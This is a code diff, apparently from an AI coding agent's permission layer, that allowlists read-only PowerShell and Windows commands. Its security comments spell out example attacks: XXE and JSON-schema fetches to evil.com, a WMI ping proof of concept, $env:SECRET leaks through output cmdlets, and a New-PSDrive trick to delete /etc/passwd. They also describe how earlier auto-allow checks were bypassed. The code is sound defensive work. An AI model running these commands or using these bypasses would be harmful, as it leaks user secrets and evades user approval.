+ ],
119
+ },
120
+ 'get-item': {
121
+ safeFlags: ['-Path', '-LiteralPath', '-Force', '-Stream'],
122
+ },
123
+ 'get-itemproperty': {
124
+ safeFlags: ['-Path', '-LiteralPath', '-Name'],
125
+ },
126
+ 'test-path': {
127
+ safeFlags: [
128
+ '-Path',
129
+ '-LiteralPath',
130
+ '-PathType',
131
+ '-Filter',
132
+ '-Include',
133
+ '-Exclude',
134
+ '-IsValid',
135
+ '-NewerThan',
136
+ '-OlderThan',
137
+ ],
138
+ },
139
+ 'resolve-path': {
140
+ safeFlags: ['-Path', '-LiteralPath', '-Relative'],
141
+ },
142
+ 'get-filehash': {
143
+ safeFlags: ['-Path', '-LiteralPath', '-Algorithm', '-InputStream'],
144
+ },
145
+ 'get-acl': {
146
+ safeFlags: [
147
+ '-Path',
148
+ '-LiteralPath',
149
+ '-Audit',
150
+ '-Filter',
151
+ '-Include',
152
+ '-Exclude',
153
+ ],
154
+ },
155
+ // =========================================================================
156
+ // PowerShell Cmdlets - Navigation (read-only, just changes working directory)
157
+ // =========================================================================
158
+ 'set-location': {
159
+ safeFlags: ['-Path', '-LiteralPath', '-PassThru', '-StackName'],
160
+ },
161
+ 'push-location': {
162
+ safeFlags: ['-Path', '-LiteralPath', '-PassThru', '-StackName'],
163
+ },
164
+ 'pop-location': {
165
+ safeFlags: ['-PassThru', '-StackName'],
166
+ },
167
+ // =========================================================================
168
+ // PowerShell Cmdlets - Text searching/filtering (read-only)
169
+ // =========================================================================
170
+ 'select-string': {
171
+ safeFlags: [
172
+ '-Path',
173
+ '-LiteralPath',
174
+ '-Pattern',
175
+ '-InputObject',
176
+ '-SimpleMatch',
177
+ '-CaseSensitive',
178
+ '-Quiet',
179
+ '-List',
180
+ '-NotMatch',
181
+ '-AllMatches',
182
+ '-Encoding',
183
+ '-Context',
184
+ '-Raw',
185
+ '-NoEmphasis',
186
+ ],
187
+ },
188
+ // =========================================================================
189
+ // PowerShell Cmdlets - Data conversion (pure transforms, no side effects)
190
+ // =========================================================================
191
+ 'convertto-json': {
192
+ safeFlags: [
193
+ '-InputObject',
194
+ '-Depth',
195
+ '-Compress',
196
+ '-EnumsAsStrings',
197
+ '-AsArray',
198
+ ],
199
+ },
200
+ 'convertfrom-json': {
201
+ safeFlags: ['-InputObject', '-Depth', '-AsHashtable', '-NoEnumerate'],
202
+ },
203
+ 'convertto-csv': {
204
+ safeFlags: [
205
+ '-InputObject',
206
+ '-Delimiter',
207
+ '-NoTypeInformation',
208
+ '-NoHeader',
209
+ '-UseQuotes',
210
+ ],
211
+ },
212
+ 'convertfrom-csv': {
213
+ safeFlags: ['-InputObject', '-Delimiter', '-Header', '-UseCulture'],
214
+ },
215
+ 'convertto-xml': {
216
+ safeFlags: ['-InputObject', '-Depth', '-As', '-NoTypeInformation'],
217
+ },
218
+ 'convertto-html': {
219
+ safeFlags: [
220
+ '-InputObject',
221
+ '-Property',
222
+ '-Head',
223
+ '-Title',
224
+ '-Body',
225
+ '-Pre',
226
+ '-Post',
227
+ '-As',
228
+ '-Fragment',
229
+ ],
230
+ },
231
+ 'format-hex': {
232
+ safeFlags: [
233
+ '-Path',
234
+ '-LiteralPath',
235
+ '-InputObject',
236
+ '-Encoding',
237
+ '-Count',
238
+ '-Offset',
239
+ ],
240
+ },
241
+ // =========================================================================
242
+ // PowerShell Cmdlets - Object inspection and manipulation (read-only)
243
+ // =========================================================================
244
+ 'get-member': {
245
+ safeFlags: [
246
+ '-InputObject',
247
+ '-MemberType',
248
+ '-Name',
249
+ '-Static',
250
+ '-View',
251
+ '-Force',
252
+ ],
253
+ },
254
+ 'get-unique': {
255
+ safeFlags: ['-InputObject', '-AsString', '-CaseInsensitive', '-OnType'],
256
+ },
257
+ 'compare-object': {
258
+ safeFlags: [
259
+ '-ReferenceObject',
260
+ '-DifferenceObject',
261
+ '-Property',
262
+ '-SyncWindow',
263
+ '-CaseSensitive',
264
+ '-Culture',
265
+ '-ExcludeDifferent',
266
+ '-IncludeEqual',
267
+ '-PassThru',
268
+ ],
269
+ },
270
+ // SECURITY: select-xml REMOVED. XML external entity (XXE) resolution can
271
+ // trigger network requests via DOCTYPE SYSTEM/PUBLIC references in -Content
272
+ // or -Xml. `Select-Xml -Content '<!DOCTYPE x [<!ENTITY e SYSTEM
273
+ // "http://evil.com/x">]><x>&e;</x>' -XPath '/'` sends a GET request.
274
+ // PowerShell's XmlDocument.LoadXml doesn't disable entity resolution by
275
+ // default. Removal forces prompt.
276
+ 'join-string': {
277
+ safeFlags: [
278
+ '-InputObject',
279
+ '-Property',
280
+ '-Separator',
281
+ '-OutputPrefix',
282
+ '-OutputSuffix',
283
+ '-SingleQuote',
284
+ '-DoubleQuote',
285
+ '-FormatString',
286
+ ],
287
+ },
288
+ // SECURITY: Test-Json REMOVED. -Schema (positional 1) accepts JSON Schema
289
+ // with $ref pointing to external URLs — Test-Json fetches them (network
290
+ // request). safeFlags only validates EXPLICIT flags, not positional binding:
291
+ // `Test-Json '{}' '{"$ref":"http://evil.com"}'` → position 1 binds to
292
+ // -Schema → safeFlags check sees two non-flag args, skips both → auto-allow.
293
+ 'get-random': {
294
+ safeFlags: [
295
+ '-InputObject',
296
+ '-Minimum',
297
+ '-Maximum',
298
+ '-Count',
299
+ '-SetSeed',
300
+ '-Shuffle',
301
+ ],
302
+ },
303
+ // =========================================================================
304
+ // PowerShell Cmdlets - Path utilities (read-only)
305
+ // =========================================================================
306
+ // convert-path's entire purpose is to resolve filesystem paths. It is now
307
+ // in CMDLET_PATH_CONFIG for proper path validation, so safeFlags here only
308
+ // list the path parameters (which CMDLET_PATH_CONFIG will validate).
309
+ 'convert-path': {
310
+ safeFlags: ['-Path', '-LiteralPath'],
311
+ },
312
+ 'join-path': {
313
+ // -Resolve removed: it touches the filesystem to verify the joined path
314
+ // exists, but the path was not validated against allowed directories.
315
+ // Without -Resolve, Join-Path is pure string manipulation.
316
+ safeFlags: ['-Path', '-ChildPath', '-AdditionalChildPath'],
317
+ },
318
+ 'split-path': {
319
+ // -Resolve removed: same rationale as join-path. Without -Resolve,
320
+ // Split-Path is pure string manipulation.
321
+ safeFlags: [
322
+ '-Path',
323
+ '-LiteralPath',
324
+ '-Qualifier',
325
+ '-NoQualifier',
326
+ '-Parent',
327
+ '-Leaf',
328
+ '-LeafBase',
329
+ '-Extension',
330
+ '-IsAbsolute',
331
+ ],
332
+ },
333
+ // =========================================================================
334
+ // PowerShell Cmdlets - Additional system info (read-only)
335
+ // =========================================================================
336
+ // NOTE: Get-Clipboard is intentionally NOT included - it can expose sensitive
337
+ // data like passwords or API keys that the user may have copied. Bash also
338
+ // does not auto-allow clipboard commands (pbpaste, xclip, etc.).
339
+ 'get-hotfix': {
340
+ safeFlags: ['-Id', '-Description'],
341
+ },
342
+ 'get-itempropertyvalue': {
343
+ safeFlags: ['-Path', '-LiteralPath', '-Name'],
344
+ },
345
+ 'get-psprovider': {
346
+ safeFlags: ['-PSProvider'],
347
+ },
348
+ // =========================================================================
349
+ // PowerShell Cmdlets - Process/System info
350
+ // =========================================================================
351
+ 'get-process': {
352
+ safeFlags: [
353
+ '-Name',
354
+ '-Id',
355
+ '-Module',
356
+ '-FileVersionInfo',
357
+ '-IncludeUserName',
358
+ ],
359
+ },
360
+ 'get-service': {
361
+ safeFlags: [
362
+ '-Name',
363
+ '-DisplayName',
364
+ '-DependentServices',
365
+ '-RequiredServices',
366
+ '-Include',
367
+ '-Exclude',
368
+ ],
369
+ },
370
+ 'get-computerinfo': {
371
+ allowAllFlags: true,
372
+ },
373
+ 'get-host': {
374
+ allowAllFlags: true,
375
+ },
376
+ 'get-date': {
377
+ safeFlags: ['-Date', '-Format', '-UFormat', '-DisplayHint', '-AsUTC'],
378
+ },
379
+ 'get-location': {
380
+ safeFlags: ['-PSProvider', '-PSDrive', '-Stack', '-StackName'],
381
+ },
382
+ 'get-psdrive': {
383
+ safeFlags: ['-Name', '-PSProvider', '-Scope'],
384
+ },
385
+ // SECURITY: Get-Command REMOVED from allowlist. -Name (positional 0,
386
+ // ValueFromPipeline=true) triggers module autoload which runs .psm1 init
387
+ // code. Chain attack: pre-plant module in PSModulePath, trigger autoload.
388
+ // Previously tried removing -Name/-Module from safeFlags + rejecting
389
+ // positional StringConstant, but pipeline input (`'EvilCmdlet' | Get-Command`)
390
+ // bypasses the callback entirely since args are empty. Removal forces
391
+ // prompt. Users who need it can add explicit allow rule.
392
+ 'get-module': {
393
+ safeFlags: [
394
+ '-Name',
395
+ '-ListAvailable',
396
+ '-All',
397
+ '-FullyQualifiedName',
398
+ '-PSEdition',
399
+ ],
400
+ },
401
+ // SECURITY: Get-Help REMOVED from allowlist. Same module autoload hazard
402
+ // as Get-Command (-Name has ValueFromPipeline=true, pipeline input bypasses
403
+ // arg-level callback). Removal forces prompt.
404
+ 'get-alias': {
405
+ safeFlags: ['-Name', '-Definition', '-Scope', '-Exclude'],
406
+ },
407
+ 'get-history': {
408
+ safeFlags: ['-Id', '-Count'],
409
+ },
410
+ 'get-culture': {
411
+ allowAllFlags: true,
412
+ },
413
+ 'get-uiculture': {
414
+ allowAllFlags: true,
415
+ },
416
+ 'get-timezone': {
417
+ safeFlags: ['-Name', '-Id', '-ListAvailable'],
418
+ },
419
+ 'get-uptime': {
420
+ allowAllFlags: true,
421
+ },
422
+ // =========================================================================
423
+ // PowerShell Cmdlets - Output & misc (no side effects)
424
+ // =========================================================================
425
+ // Bash parity: `echo` is auto-allowed via custom regex (BashTool
426
+ // readOnlyValidation.ts:~1517). That regex WHITELISTS safe chars per arg.
427
+ // See argLeaksValue above for the three attack shapes it blocks.
428
+ 'write-output': {
429
+ safeFlags: ['-InputObject', '-NoEnumerate'],
430
+ additionalCommandIsDangerousCallback: argLeaksValue,
431
+ },
432
+ // Write-Host bypasses the pipeline (Information stream, PS5+), so it's
433
+ // strictly less capable than Write-Output — but the same
434
+ // `Write-Host $env:SECRET` leak-via-display applies.
435
+ 'write-host': {
436
+ safeFlags: [
437
+ '-Object',
438
+ '-NoNewline',
439
+ '-Separator',
440
+ '-ForegroundColor',
441
+ '-BackgroundColor',
442
+ ],
443
+ additionalCommandIsDangerousCallback: argLeaksValue,
444
+ },
445
+ // Bash parity: `sleep` is in READONLY_COMMANDS (BashTool
446
+ // readOnlyValidation.ts:~1146). Zero side effects at runtime — but
447
+ // `Start-Sleep $env:SECRET` leaks via type-coerce error. Same guard.
448
+ 'start-sleep': {
449
+ safeFlags: ['-Seconds', '-Milliseconds', '-Duration'],
450
+ additionalCommandIsDangerousCallback: argLeaksValue,
451
+ },
452
+ // Format-* and Measure-Object moved here from SAFE_OUTPUT_CMDLETS after
453
+ // security review found all accept calculated-property hashtables (same
454
+ // exploit as Where-Object — I4 regression). isSafeOutputCommand is a
455
+ // NAME-ONLY check that filtered them out of the approval loop BEFORE arg
456
+ // validation. Here, argLeaksValue validates args:
457
+ // | Format-Table → no args → safe → allow
458
+ // | Format-Table Name, CPU → StringConstant positionals → safe → allow
459
+ // | Format-Table $env:SECRET → Variable elementType → blocked → passthrough
460
+ // | Format-Table @{N='x';E={}} → Other (HashtableAst) → blocked → passthrough
461
+ // | Measure-Object -Property $env:SECRET → same → blocked
462
+ // allowAllFlags: argLeaksValue validates arg elementTypes (Variable/Hashtable/
463
+ // ScriptBlock → blocked). Format-* flags themselves (-AutoSize, -GroupBy,
464
+ // -Wrap, etc.) are display-only. Without allowAllFlags, the empty-safeFlags
465
+ // default rejects ALL flags — `Format-Table -AutoSize` would over-prompt.
466
+ 'format-table': {
467
+ allowAllFlags: true,
468
+ additionalCommandIsDangerousCallback: argLeaksValue,
469
+ },
470
+ 'format-list': {
471
+ allowAllFlags: true,
472
+ additionalCommandIsDangerousCallback: argLeaksValue,
473
+ },
474
+ 'format-wide': {
475
+ allowAllFlags: true,
476
+ additionalCommandIsDangerousCallback: argLeaksValue,
477
+ },
478
+ 'format-custom': {
479
+ allowAllFlags: true,
480
+ additionalCommandIsDangerousCallback: argLeaksValue,
481
+ },
482
+ 'measure-object': {
483
+ allowAllFlags: true,
484
+ additionalCommandIsDangerousCallback: argLeaksValue,
485
+ },
486
+ // Select-Object/Sort-Object/Group-Object/Where-Object: same calculated-
487
+ // property hashtable surface as format-* (about_Calculated_Properties).
488
+ // Removed from SAFE_OUTPUT_CMDLETS but previously missing here, causing
489
+ // `Get-Process | Select-Object Name` to over-prompt. argLeaksValue handles
490
+ // them identically: StringConstant property names pass (`Select-Object Name`),
491
+ // HashtableAst/ScriptBlock/Variable args block (`Select-Object @{N='x';E={...}}`,
492
+ // `Where-Object { ... }`). allowAllFlags: -First/-Last/-Skip/-Descending/
493
+ // -Property/-EQ etc. are all selection/ordering flags — harmless on their own;
494
+ // argLeaksValue catches the dangerous arg *values*.
495
+ 'select-object': {
496
+ allowAllFlags: true,
497
+ additionalCommandIsDangerousCallback: argLeaksValue,
498
+ },
499
+ 'sort-object': {
500
+ allowAllFlags: true,
501
+ additionalCommandIsDangerousCallback: argLeaksValue,
502
+ },
503
+ 'group-object': {
504
+ allowAllFlags: true,
505
+ additionalCommandIsDangerousCallback: argLeaksValue,
506
+ },
507
+ 'where-object': {
508
+ allowAllFlags: true,
509
+ additionalCommandIsDangerousCallback: argLeaksValue,
510
+ },
511
+ // Out-String/Out-Host moved here from SAFE_OUTPUT_CMDLETS — both accept
512
+ // -InputObject which leaks the same way Write-Output does.
513
+ // `Get-Process | Out-String -InputObject $env:SECRET` → secret prints.
514
+ // allowAllFlags: -Width/-Stream/-Paging/-NoNewline are display flags;
515
+ // argLeaksValue catches the dangerous -InputObject *value*.
516
+ 'out-string': {
517
+ allowAllFlags: true,
518
+ additionalCommandIsDangerousCallback: argLeaksValue,
519
+ },
520
+ 'out-host': {
521
+ allowAllFlags: true,
522
+ additionalCommandIsDangerousCallback: argLeaksValue,
523
+ },
524
+ // =========================================================================
525
+ // PowerShell Cmdlets - Network info (read-only)
526
+ // =========================================================================
527
+ 'get-netadapter': {
528
+ safeFlags: [
529
+ '-Name',
530
+ '-InterfaceDescription',
531
+ '-InterfaceIndex',
532
+ '-Physical',
533
+ ],
534
+ },
535
+ 'get-netipaddress': {
536
+ safeFlags: [
537
+ '-InterfaceIndex',
538
+ '-InterfaceAlias',
539
+ '-AddressFamily',
540
+ '-Type',
541
+ ],
542
+ },
543
+ 'get-netipconfiguration': {
544
+ safeFlags: ['-InterfaceIndex', '-InterfaceAlias', '-Detailed', '-All'],
545
+ },
546
+ 'get-netroute': {
547
+ safeFlags: [
548
+ '-InterfaceIndex',
549
+ '-InterfaceAlias',
550
+ '-AddressFamily',
551
+ '-DestinationPrefix',
552
+ ],
553
+ },
554
+ 'get-dnsclientcache': {
555
+ // SECURITY: -CimSession/-ThrottleLimit excluded. -CimSession connects to
556
+ // a remote host (network request). Previously empty config = all flags OK.
557
+ safeFlags: ['-Entry', '-Name', '-Type', '-Status', '-Section', '-Data'],
558
+ },
559
+ 'get-dnsclient': {
560
+ safeFlags: ['-InterfaceIndex', '-InterfaceAlias'],
561
+ },
562
+ // =========================================================================
563
+ // PowerShell Cmdlets - Event log (read-only)
564
+ // =========================================================================
565
+ 'get-eventlog': {
566
+ safeFlags: [
567
+ '-LogName',
568
+ '-Newest',
569
+ '-After',
570
+ '-Before',
571
+ '-EntryType',
572
+ '-Index',
573
+ '-InstanceId',
574
+ '-Message',
575
+ '-Source',
576
+ '-UserName',
577
+ '-AsBaseObject',
578
+ '-List',
579
+ ],
580
+ },
581
+ 'get-winevent': {
582
+ // SECURITY: -FilterXml/-FilterHashtable removed. -FilterXml accepts XML
583
+ // with DOCTYPE external entities (XXE → network request). -FilterHashtable
584
+ // would be caught by the elementTypes 'Other' check since @{} is
585
+ // HashtableAst, but removal is explicit. Same XXE hazard as Select-Xml
586
+ // (removed above). -FilterXPath kept (string pattern only, no entity
587
+ // resolution). -ComputerName/-Credential also implicitly excluded.
588
+ safeFlags: [
589
+ '-LogName',
590
+ '-ListLog',
591
+ '-ListProvider',
592
+ '-ProviderName',
593
+ '-Path',
594
+ '-MaxEvents',
595
+ '-FilterXPath',
596
+ '-Force',
597
+ '-Oldest',
598
+ ],
599
+ },
600
+ // =========================================================================
601
+ // PowerShell Cmdlets - WMI/CIM
602
+ // =========================================================================
603
+ // SECURITY: Get-WmiObject and Get-CimInstance REMOVED. They actively
604
+ // trigger network requests via classes like Win32_PingStatus (sends ICMP
605
+ // when enumerated) and can query remote computers via -ComputerName/
606
+ // CimSession. -Class/-ClassName/-Filter/-Query accept arbitrary WMI
607
+ // classes/WQL that we cannot statically validate.
608
+ // PoC: Get-WmiObject -Class Win32_PingStatus -Filter 'Address="evil.com"'
609
+ // → sends ICMP to evil.com (DNS leak + potential NTLM auth leak).
610
+ // WMI can also auto-load provider DLLs (init code). Removal forces prompt.
611
+ // get-cimclass stays — only lists class metadata, no instance enumeration.
612
+ 'get-cimclass': {
613
+ safeFlags: [
614
+ '-ClassName',
615
+ '-Namespace',
616
+ '-MethodName',
617
+ '-PropertyName',
618
+ '-QualifierName',
619
+ ],
620
+ },
621
+ // =========================================================================
622
+ // Git - uses shared external command validation with per-flag checking
623
+ // =========================================================================
624
+ git: {},
625
+ // =========================================================================
626
+ // GitHub CLI (gh) - uses shared external command validation
627
+ // =========================================================================
628
+ gh: {},
629
+ // =========================================================================
630
+ // Docker - uses shared external command validation
631
+ // =========================================================================
632
+ docker: {},
633
+ // =========================================================================
634
+ // Windows-specific system commands
635
+ // =========================================================================
636
+ ipconfig: {
637
+ // SECURITY: On macOS, `ipconfig set <iface> <mode>` configures network
638
+ // (writes system config). safeFlags only validates FLAGS, positional args
639
+ // are SKIPPED. Reject any positional argument — only bare `ipconfig` or
640
+ // `ipconfig /all` (read-only display) allowed. Windows ipconfig only uses
641
+ // /flags (display), macOS ipconfig uses subcommands (get/set/waitall).
642
+ safeFlags: ['/all', '/displaydns', '/allcompartments'],
643
+ additionalCommandIsDangerousCallback: (_cmd, element) => {
644
+ return (element?.args ?? []).some(a => !a.startsWith('/') && !a.startsWith('-'));
645
+ },
646
+ },
647
+ netstat: {
648
+ safeFlags: [
649
+ '-a',
650
+ '-b',
651
+ '-e',
652
+ '-f',
653
+ '-n',
654
+ '-o',
655
+ '-p',
656
+ '-q',
657
+ '-r',
658
+ '-s',
659
+ '-t',
660
+ '-x',
661
+ '-y',
662
+ ],
663
+ },
664
+ systeminfo: {
665
+ safeFlags: ['/FO', '/NH'],
666
+ },
667
+ tasklist: {
668
+ safeFlags: ['/M', '/SVC', '/V', '/FI', '/FO', '/NH'],
669
+ },
670
+ // where.exe: Windows PATH locator, bash `which` equivalent. Reaches here via
671
+ // SAFE_EXTERNAL_EXES bypass at the nameType gate in isAllowlistedCommand.
672
+ // All flags are read-only (/R /F /T /Q), matching bash's treatment of `which`
673
+ // in BashTool READONLY_COMMANDS.
674
+ 'where.exe': {
675
+ allowAllFlags: true,
676
+ },
677
+ hostname: {
678
+ // SECURITY: `hostname NAME` on Linux/macOS SETS the hostname (writes to
679
+ // system config). `hostname -F FILE` / `--file=FILE` also sets from file.
680
+ // Only allow bare `hostname` and known read-only flags.
681
+ safeFlags: ['-a', '-d', '-f', '-i', '-I', '-s', '-y', '-A'],
682
+ additionalCommandIsDangerousCallback: (_cmd, element) => {
683
+ // Reject any positional (non-flag) argument — sets hostname.
684
+ return (element?.args ?? []).some(a => !a.startsWith('-'));
685
+ },
686
+ },
687
+ whoami: {
688
+ safeFlags: [
689
+ '/user',
690
+ '/groups',
691
+ '/claims',
692
+ '/priv',
693
+ '/logonid',
694
+ '/all',
695
+ '/fo',
696
+ '/nh',
697
+ ],
698
+ },
699
+ ver: {
700
+ allowAllFlags: true,
701
+ },
702
+ arp: {
703
+ safeFlags: ['-a', '-g', '-v', '-N'],
704
+ },
705
+ route: {
706
+ safeFlags: ['print', 'PRINT', '-4', '-6'],
707
+ additionalCommandIsDangerousCallback: (_cmd, element) => {
708
+ // SECURITY: route.exe syntax is `route [-f] [-p] [-4|-6] VERB [args...]`.
709
+ // The first non-flag positional is the verb. `route add 10.0.0.0 mask
710
+ // 255.0.0.0 192.168.1.1 print` adds a route (print is a trailing display
711
+ // modifier). The old check used args.some('print') which matched 'print'
712
+ // anywhere — position-insensitive.
713
+ if (!element) {
714
+ return true;
715
+ }
716
+ const verb = element.args.find(a => !a.startsWith('-'));
717
+ return verb?.toLowerCase() !== 'print';
718
+ },
719
+ },
720
+ // netsh: intentionally NOT allowlisted. Three rounds of denylist gaps in PR
721
+ // #22060 (verb position → dash flags → slash flags → more verbs) proved
722
+ // the grammar is too complex to allowlist safely: 3-deep context nesting
723
+ // (`netsh interface ipv4 show addresses`), dual-prefix flags (-f / /f),
724
+ // script execution via -f and `exec`, remote RPC via -r, offline-mode
725
+ // commit, wlan connect/disconnect, etc. Each denylist expansion revealed
726
+ // another gap. `route` stays — `route print` is the only read-only form,
727
+ // simple single-verb-position grammar.
728
+ getmac: {
729
+ safeFlags: ['/FO', '/NH', '/V'],
730
+ },
731
+ // =========================================================================
732
+ // Cross-platform CLI tools
733
+ // =========================================================================
734
+ // File inspection
735
+ // SECURITY: file -C compiles a magic database and WRITES to disk. Only
736
+ // allow introspection flags; reject -C / --compile / -m / --magic-file.
737
+ file: {
738
+ safeFlags: [
739
+ '-b',
740
+ '--brief',
741
+ '-i',
742
+ '--mime',
743
+ '-L',
744
+ '--dereference',
745
+ '--mime-type',
746
+ '--mime-encoding',
747
+ '-z',
748
+ '--uncompress',
749
+ '-p',
750
+ '--preserve-date',
751
+ '-k',
752
+ '--keep-going',
753
+ '-r',
754
+ '--raw',
755
+ '-v',
756
+ '--version',
757
+ '-0',
758
+ '--print0',
759
+ '-s',
760
+ '--special-files',
761
+ '-l',
762
+ '-F',
763
+ '--separator',
764
+ '-e',
765
+ '-P',
766
+ '-N',
767
+ '--no-pad',
768
+ '-E',
769
+ '--extension',
770
+ ],
771
+ },
772
+ tree: {
773
+ safeFlags: ['/F', '/A', '/Q', '/L'],
774
+ },
775
+ findstr: {
776
+ safeFlags: [
777
+ '/B',
778
+ '/E',
779
+ '/L',
780
+ '/R',
781
+ '/S',
782
+ '/I',
783
+ '/X',
784
+ '/V',
785
+ '/N',
786
+ '/M',
787
+ '/O',
788
+ '/P',
789
+ // Flag matching strips ':' before comparison (e.g., /C:pattern → /C),
790
+ // so these entries must NOT include the trailing colon.
791
+ '/C',
792
+ '/G',
793
+ '/D',
794
+ '/A',
795
+ ],
796
+ },
797
+ // =========================================================================
798
+ // Package managers - uses shared external command validation
799
+ // =========================================================================
800
+ dotnet: {},
801
+ // SECURITY: man and help direct entries REMOVED. They aliased Get-Help
802
+ // (also removed — see above). Without these entries, lookupAllowlist
803
+ // resolves via COMMON_ALIASES to 'get-help' which is not in allowlist →
804
+ // prompt. Same module-autoload hazard as Get-Help.
805
+ });
806
+ /**
807
+ * Safe output/formatting cmdlets that can receive piped input.
808
+ * Stored as canonical cmdlet names in lowercase.
809
+ */
810
+ const SAFE_OUTPUT_CMDLETS = new Set([
811
+ 'out-null',
812
+ // NOT out-string/out-host — both accept -InputObject which leaks args the
813
+ // same way Write-Output does. Moved to CMDLET_ALLOWLIST with argLeaksValue.
814
+ // `Get-Process | Out-String -InputObject $env:SECRET` — Out-String was
815
+ // filtered name-only, the $env arg was never validated.
816
+ // out-null stays: it discards everything, no -InputObject leak.
817
+ // NOT foreach-object / where-object / select-object / sort-object /
818
+ // group-object / format-table / format-list / format-wide / format-custom /
819
+ // measure-object — ALL accept calculated-property hashtables or script-block
820
+ // predicates that evaluate arbitrary expressions at runtime
821
+ // (about_Calculated_Properties). Examples:
822
+ // Where-Object @{k=$env:SECRET} — HashtableAst arg, 'Other' elementType
823
+ // Select-Object @{N='x';E={...}} — calculated property scriptblock
824
+ // Format-Table $env:SECRET — positional -Property, prints as header
825
+ // Measure-Object -Property $env:SECRET — leaks via "property 'sk-...' not found"
826
+ // ForEach-Object { $env:PATH='e' } — arbitrary script body
827
+ // isSafeOutputCommand is a NAME-ONLY check — step-5 filters these out of
828
+ // the approval loop BEFORE arg validation runs. With them here, an
829
+ // all-safe-output tail auto-allows on empty subCommands regardless of
830
+ // what the arg contains. Removing them forces the tail through arg-level
831
+ // validation (hashtable is 'Other' elementType → fails the whitelist at
832
+ // isAllowlistedCommand → ask; bare $var is 'Variable' → same).
833
+ //
834
+ // NOT write-output — pipeline-initial $env:VAR is a VariableExpressionAst,
835
+ // skipped by getSubCommandsForPermissionCheck (non-CommandAst). With
836
+ // write-output here, `$env:SECRET | Write-Output` → WO filtered as
837
+ // safe-output → empty subCommands → auto-allow → secret prints. The
838
+ // CMDLET_ALLOWLIST entry handles direct `Write-Output 'literal'`.
839
+ ]);
840
+ /**
841
+ * Cmdlets moved from SAFE_OUTPUT_CMDLETS to CMDLET_ALLOWLIST with
842
+ * argLeaksValue. These are pipeline-tail transformers (Format-*,
843
+ * Measure-Object, Select-Object, etc.) that were previously name-only
844
+ * filtered as safe-output. They now require arg validation (argLeaksValue
845
+ * blocks calculated-property hashtables / scriptblocks / variable args).
846
+ *
847
+ * Used by isAllowlistedPipelineTail for the narrow fallback in
848
+ * checkPermissionMode and isReadOnlyCommand — these callers need the same
849
+ * "skip harmless pipeline tail" behavior as SAFE_OUTPUT_CMDLETS but with
850
+ * the argLeaksValue guard.
851
+ */
852
+ const PIPELINE_TAIL_CMDLETS = new Set([
853
+ 'format-table',
854
+ 'format-list',
855
+ 'format-wide',
856
+ 'format-custom',
857
+ 'measure-object',
858
+ 'select-object',
859
+ 'sort-object',
860
+ 'group-object',
861
+ 'where-object',
862
+ 'out-string',
863
+ 'out-host',
864
+ ]);
865
+ /**
866
+ * External .exe names allowed past the nameType='application' gate.
867
+ *
868
+ * classifyCommandName returns 'application' for any name containing a dot,
869
+ * which the nameType gate at isAllowlistedCommand rejects before allowlist
870
+ * lookup. That gate exists to block scripts\Get-Process → stripModulePrefix →
871
+ * cmd.name='Get-Process' spoofing. But it also catches benign PATH-resolved
872
+ * .exe names like where.exe (bash `which` equivalent — pure read, no dangerous
873
+ * flags).
874
+ *
875
+ * SECURITY: the bypass checks the raw first token of cmd.text, NOT cmd.name.
876
+ * stripModulePrefix collapses scripts\where.exe → cmd.name='where.exe', but
877
+ * cmd.text preserves the raw 'scripts\where.exe ...'. Matching cmd.text's
878
+ * first token defeats that spoofing — only a bare `where.exe` (PATH lookup)
879
+ * gets through.
880
+ *
881
+ * Each entry here MUST have a matching CMDLET_ALLOWLIST entry for flag
882
+ * validation.
883
+ */
884
+ const SAFE_EXTERNAL_EXES = new Set(['where.exe']);
885
+ /**
886
+ * Windows PATHEXT extensions that PowerShell resolves via PATH lookup.
887
+ * `git.exe`, `git.cmd`, `git.bat`, `git.com` all invoke git at runtime and
888
+ * must resolve to the same canonical name so git-safety guards fire.
889
+ * .ps1 is intentionally excluded — a script named git.ps1 is not the git
890
+ * binary and does not trigger git's hook mechanism.
891
+ */
892
+ const WINDOWS_PATHEXT = /\.(exe|cmd|bat|com)$/;
893
+ /**
894
+ * Resolves a command name to its canonical cmdlet name using COMMON_ALIASES.
895
+ * Strips Windows executable extensions (.exe, .cmd, .bat, .com) from path-free
896
+ * names so e.g. `git.exe` canonicalises to `git` and triggers git-safety
897
+ * guards (powershellPermissions.ts hasGitSubCommand). SECURITY: only strips
898
+ * when the name has no path separator — `scripts\git.exe` is a relative path
899
+ * (runs a local script, not PATH-resolved git) and must NOT canonicalise to
900
+ * `git`. Returns lowercase canonical name.
901
+ */
902
+ export function resolveToCanonical(name) {
903
+ let lower = name.toLowerCase();
904
+ // Only strip PATHEXT on bare names — paths run a specific file, not the
905
+ // PATH-resolved executable the guards are protecting against.
906
+ if (!lower.includes('\\') && !lower.includes('/')) {
907
+ lower = lower.replace(WINDOWS_PATHEXT, '');
908
+ }
909
+ const alias = COMMON_ALIASES[lower];
910
+ if (alias) {
911
+ return alias.toLowerCase();
912
+ }
913
+ return lower;
914
+ }
915
+ /**
916
+ * Checks if a command name (after alias resolution) alters the path-resolution
917
+ * namespace for subsequent statements in the same compound command.
918
+ *
919
+ * Covers TWO classes:
920
+ * 1. Cwd-changing cmdlets: Set-Location, Push-Location, Pop-Location (and
921
+ * aliases cd, sl, chdir, pushd, popd). Subsequent relative paths resolve
922
+ * from the new cwd.
923
+ * 2. PSDrive-creating cmdlets: New-PSDrive (and aliases ndr, mount on Windows).
924
+ * Subsequent drive-prefixed paths (p:/foo) resolve via the new drive root,
925
+ * not via the filesystem. Finding #21: `New-PSDrive -Name p -Root /etc;
926
+ * Remove-Item p:/passwd` — the validator cannot know p: maps to /etc.
927
+ *
928
+ * Any compound containing one of these cannot have its later statements'
929
+ * relative/drive-prefixed paths validated against the stale validator cwd.
930
+ *
931
+ * Name kept for BashTool parity (isCwdChangingCmdlet ↔ compoundCommandHasCd);
932
+ * semantically this is "alters path-resolution namespace".
933
+ */
934
+ export function isCwdChangingCmdlet(name) {
935
+ const canonical = resolveToCanonical(name);
936
+ return (canonical === 'set-location' ||
937
+ canonical === 'push-location' ||
938
+ canonical === 'pop-location' ||
939
+ // New-PSDrive creates a drive mapping that redirects <name>:/... paths
940
+ // to an arbitrary filesystem root. Aliases ndr/mount are not in
941
+ // COMMON_ALIASES — check them explicitly (finding #21).
942
+ canonical === 'new-psdrive' ||
943
+ // ndr/mount are PS aliases for New-PSDrive on Windows only. On POSIX,
944
+ // 'mount' is the native mount(8) command; treating it as PSDrive-creating
945
+ // would false-positive. (bug #15 / review nit)
946
+ (getPlatform() === 'windows' &&
947
+ (canonical === 'ndr' || canonical === 'mount')));
948
+ }
949
+ /**
950
+ * Checks if a command name (after alias resolution) is a safe output cmdlet.
951
+ */
952
